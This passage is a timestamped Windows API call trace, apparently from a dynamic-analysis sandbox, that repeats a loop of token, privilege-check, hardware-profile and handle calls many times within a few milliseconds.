(dwErrCode=0x522) [0016.934] CloseHandle (hObject=0x114) returned 1 [0016.934] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.934] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.934] GetLastError () returned 0x578 [0016.934] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.934] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.934] GetCurrentThread () returned 0xfffffffe [0016.934] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.934] GetLastError () returned 0x3f0 [0016.934] GetCurrentProcess () returned 0xffffffff [0016.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.934] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.934] SetLastError (dwErrCode=0x522) [0016.934] CloseHandle (hObject=0x114) returned 1 [0016.934] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.934] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.934] GetLastError () returned 0x578 [0016.934] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.934] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.934] GetCurrentThread () returned 0xfffffffe [0016.934] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.934] GetLastError () returned 0x3f0 [0016.934] GetCurrentProcess () returned 0xffffffff [0016.934] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.934] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.935] SetLastError (dwErrCode=0x522) [0016.935] CloseHandle (hObject=0x114) returned 1 [0016.935] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.935] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.935] GetLastError () returned 0x578 [0016.935] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.935] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.935] GetCurrentThread () returned 0xfffffffe [0016.935] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.935] GetLastError () returned 0x3f0 [0016.935] GetCurrentProcess () returned 0xffffffff [0016.935] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.935] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.935] SetLastError (dwErrCode=0x522) [0016.935] CloseHandle (hObject=0x114) returned 1 [0016.935] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.935] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.935] GetLastError () returned 0x578 [0016.935] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.935] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.935] GetCurrentThread () returned 0xfffffffe [0016.935] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.935] GetLastError () returned 0x3f0 [0016.935] GetCurrentProcess () returned 0xffffffff [0016.935] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.935] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.936] SetLastError (dwErrCode=0x522) [0016.936] CloseHandle (hObject=0x114) returned 1 [0016.936] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.936] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.936] GetLastError () returned 0x578 [0016.936] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.936] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.936] GetCurrentThread () returned 0xfffffffe [0016.936] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.936] GetLastError () returned 0x3f0 [0016.936] GetCurrentProcess () returned 0xffffffff [0016.936] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.936] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.936] SetLastError (dwErrCode=0x522) [0016.936] CloseHandle (hObject=0x114) returned 1 [0016.936] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.936] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.936] GetLastError () returned 0x578 [0016.936] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.936] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.936] GetCurrentThread () returned 0xfffffffe [0016.936] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.936] GetLastError () returned 0x3f0 [0016.936] GetCurrentProcess () returned 0xffffffff [0016.936] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.936] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.936] SetLastError (dwErrCode=0x522) [0016.936] CloseHandle (hObject=0x114) returned 1 [0016.936] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.936] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.936] GetLastError () returned 0x578 [0016.936] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.936] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.936] GetCurrentThread () returned 0xfffffffe [0016.936] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.936] GetLastError () returned 0x3f0 [0016.937] GetCurrentProcess () returned 0xffffffff [0016.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.937] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.937] SetLastError (dwErrCode=0x522) [0016.937] CloseHandle (hObject=0x114) returned 1 [0016.937] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.937] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.937] GetLastError () returned 0x578 [0016.937] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.937] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.937] GetCurrentThread () returned 0xfffffffe [0016.937] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.937] GetLastError () returned 0x3f0 [0016.937] GetCurrentProcess () returned 0xffffffff [0016.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.937] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.937] SetLastError (dwErrCode=0x522) [0016.937] CloseHandle (hObject=0x114) returned 1 [0016.937] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.937] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.937] GetLastError () returned 0x578 [0016.937] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.937] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.937] GetCurrentThread () returned 0xfffffffe [0016.937] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.937] GetLastError () returned 0x3f0 [0016.937] GetCurrentProcess () returned 0xffffffff [0016.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.937] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.937] SetLastError (dwErrCode=0x522) [0016.937] CloseHandle (hObject=0x114) returned 1 [0016.937] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.937] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.937] GetLastError () returned 0x578 [0016.937] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.937] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.937] GetCurrentThread () returned 0xfffffffe [0016.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.938] GetLastError () returned 0x3f0 [0016.938] GetCurrentProcess () returned 0xffffffff [0016.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.938] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.938] SetLastError (dwErrCode=0x522) [0016.938] CloseHandle (hObject=0x114) returned 1 [0016.938] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.938] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.938] GetLastError () returned 0x578 [0016.938] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.938] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.938] GetCurrentThread () returned 0xfffffffe [0016.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.938] GetLastError () returned 0x3f0 [0016.938] GetCurrentProcess () returned 0xffffffff [0016.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.938] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.938] SetLastError (dwErrCode=0x522) [0016.938] CloseHandle (hObject=0x114) returned 1 [0016.938] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.938] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.938] GetLastError () returned 0x578 [0016.938] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.938] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.938] GetCurrentThread () returned 0xfffffffe [0016.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.938] GetLastError () returned 0x3f0 [0016.938] GetCurrentProcess () returned 0xffffffff [0016.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.938] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.938] SetLastError (dwErrCode=0x522) [0016.938] CloseHandle (hObject=0x114) returned 1 [0016.938] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.938] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.938] GetLastError () returned 0x578 [0016.938] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.938] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.938] GetCurrentThread () returned 0xfffffffe [0016.938] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.939] GetLastError () returned 0x3f0 [0016.939] GetCurrentProcess () returned 0xffffffff [0016.939] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.939] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.939] SetLastError (dwErrCode=0x522) [0016.939] CloseHandle (hObject=0x114) returned 1 [0016.939] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.939] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.939] GetLastError () returned 0x578 [0016.939] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.939] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.939] GetCurrentThread () returned 0xfffffffe [0016.939] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.939] GetLastError () returned 0x3f0 [0016.939] GetCurrentProcess () returned 0xffffffff [0016.939] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.939] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.939] SetLastError (dwErrCode=0x522) [0016.939] CloseHandle (hObject=0x114) returned 1 [0016.939] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.939] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.939] GetLastError () returned 0x578 [0016.939] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.939] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.939] GetCurrentThread () returned 0xfffffffe [0016.939] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.939] GetLastError () returned 0x3f0 [0016.939] GetCurrentProcess () returned 0xffffffff [0016.939] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.939] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.939] SetLastError (dwErrCode=0x522) [0016.939] CloseHandle (hObject=0x114) returned 1 [0016.939] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.939] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.939] GetLastError () returned 0x578 [0016.939] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.939] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.939] GetCurrentThread () returned 0xfffffffe [0016.939] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.939] GetLastError () returned 0x3f0 [0016.939] GetCurrentProcess () returned 0xffffffff [0016.939] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.939] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.940] SetLastError (dwErrCode=0x522) [0016.940] CloseHandle (hObject=0x114) returned 1 [0016.940] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.940] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.940] GetLastError () returned 0x578 [0016.940] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.940] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.940] GetCurrentThread () returned 0xfffffffe [0016.940] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.940] GetLastError () returned 0x3f0 [0016.940] GetCurrentProcess () returned 0xffffffff [0016.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.940] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.940] SetLastError (dwErrCode=0x522) [0016.940] CloseHandle (hObject=0x114) returned 1 [0016.940] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.940] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.940] GetLastError () returned 0x578 [0016.940] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.940] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.940] GetCurrentThread () returned 0xfffffffe [0016.940] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.940] GetLastError () returned 0x3f0 [0016.940] GetCurrentProcess () returned 0xffffffff [0016.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.940] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.940] SetLastError (dwErrCode=0x522) [0016.940] CloseHandle (hObject=0x114) returned 1 [0016.940] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.940] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.940] GetLastError () returned 0x578 [0016.940] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.940] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.940] GetCurrentThread () returned 0xfffffffe [0016.940] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.940] GetLastError () returned 0x3f0 [0016.940] GetCurrentProcess () returned 0xffffffff [0016.940] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.940] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.940] SetLastError (dwErrCode=0x522) [0016.940] CloseHandle (hObject=0x114) returned 1 [0016.940] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.940] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.940] GetLastError () returned 0x578 [0016.941] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.941] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.941] GetCurrentThread () returned 0xfffffffe [0016.941] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.941] GetLastError () returned 0x3f0 [0016.941] GetCurrentProcess () returned 0xffffffff [0016.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.941] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.941] SetLastError (dwErrCode=0x522) [0016.941] CloseHandle (hObject=0x114) returned 1 [0016.941] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.941] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.941] GetLastError () returned 0x578 [0016.941] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.941] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.941] GetCurrentThread () returned 0xfffffffe [0016.941] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.941] GetLastError () returned 0x3f0 [0016.941] GetCurrentProcess () returned 0xffffffff [0016.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.941] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.941] SetLastError (dwErrCode=0x522) [0016.941] CloseHandle (hObject=0x114) returned 1 [0016.941] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.941] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.941] GetLastError () returned 0x578 [0016.941] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.941] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.941] GetCurrentThread () returned 0xfffffffe [0016.941] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.941] GetLastError () returned 0x3f0 [0016.941] GetCurrentProcess () returned 0xffffffff [0016.941] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.941] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, 